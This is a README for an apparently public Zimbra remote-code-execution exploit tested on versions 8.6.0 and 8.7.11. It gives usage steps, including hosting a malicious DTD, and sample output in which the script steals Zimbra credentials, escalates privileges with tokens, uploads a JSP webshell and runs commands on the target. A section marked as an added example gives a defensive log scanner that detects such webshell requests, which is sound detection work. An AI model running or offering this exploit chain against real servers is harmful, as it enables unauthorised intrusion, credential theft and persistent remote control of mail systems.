Zimbra-RCE-exploit

RCE exploit for the attack chain described in the "A Saga of Code Executions on Zimbra" post. Tested with Zimbra 8.6.0 and 8.7.11.

Usage:

$ git clone https://github.com/nth347/Zimbra-RCE-exploit.git
$ cd Zimbra-RCE-exploit/
$ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
$ chmod +x exploit.py
$ ./exploit.py

Example:

$ ./exploit.py                   
[i] Getting Zimbra credentials
[+] Got credentials: zimbra:XXXXXX

[i] Getting low-privilege token
[+] Got low-privilege token: XXXXX

[i] Getting high-privilege token
[+] Got high-privilege token: XXXXX

[i] Uploading webshell
[+] Uploaded webshell. Location https://mail.test.com/downloads/shell.jsp

webshell@target$ id
uid=999(zimbra) gid=999(zimbra) groups=999(zimbra),0(root)
webshell@target$ 
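
For defenders, the last stage in the output above leaves a JSP file being served from /downloads/. The following is an added example, not part of this repository: it scans web access-log lines for requests to JSP files under that path and marks the ones the server answered with 2xx. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined-log-format prefix: client, timestamp, request line, status.
# Assumption: the server's access log uses this common layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# A JSP under /downloads/, the location reported in the example run above.
# Tolerates a query string or a ;path-parameter after the extension.
JSP_IN_DOWNLOADS = re.compile(r'^/downloads/[^?;]*\.jspx?(?:[;?].*)?$', re.IGNORECASE)

def find_downloads_jsp_hits(lines):
    """Return {client_ip: [(timestamp, method, path, status, served), ...]}
    for every request to a JSP under /downloads/. 'served' is True when the
    status is 2xx, i.e. the file exists and was executed by the server."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; ignore
        path = unquote(m.group("path"))  # decode %xx before matching
        if not JSP_IN_DOWNLOADS.match(path):
            continue
        status = int(m.group("status"))
        served = 200 <= status < 300
        hits[m.group("ip")].append((m.group("ts"), m.group("method"), path, status, served))
    return dict(hits)

# Constructed sample log lines (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2019:10:01:02 +0000] "GET /downloads/client-installer.msi HTTP/1.1" 200 1048576 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2019:10:05:40 +0000] "POST /downloads/shell.jsp HTTP/1.1" 200 58 "-" "python-requests/2.21.0"',
    '192.0.2.44 - - [12/Mar/2019:10:07:11 +0000] "GET /downloads/test.jsp HTTP/1.1" 404 312 "-" "curl/7.61.0"',
    '198.51.100.7 - - [12/Mar/2019:10:08:00 +0000] "GET /index.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for ip, events in find_downloads_jsp_hits(SAMPLE_LOG).items():
        for ts, method, path, status, served in events:
            print(f"{'SERVED' if served else 'probe '} {ip} [{ts}] {method} {path} -> {status}")
```

A served hit warrants checking the file on disk and the requests from the same client that preceded it; a non-2xx hit is a probe for a file that was not there.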

Reference:
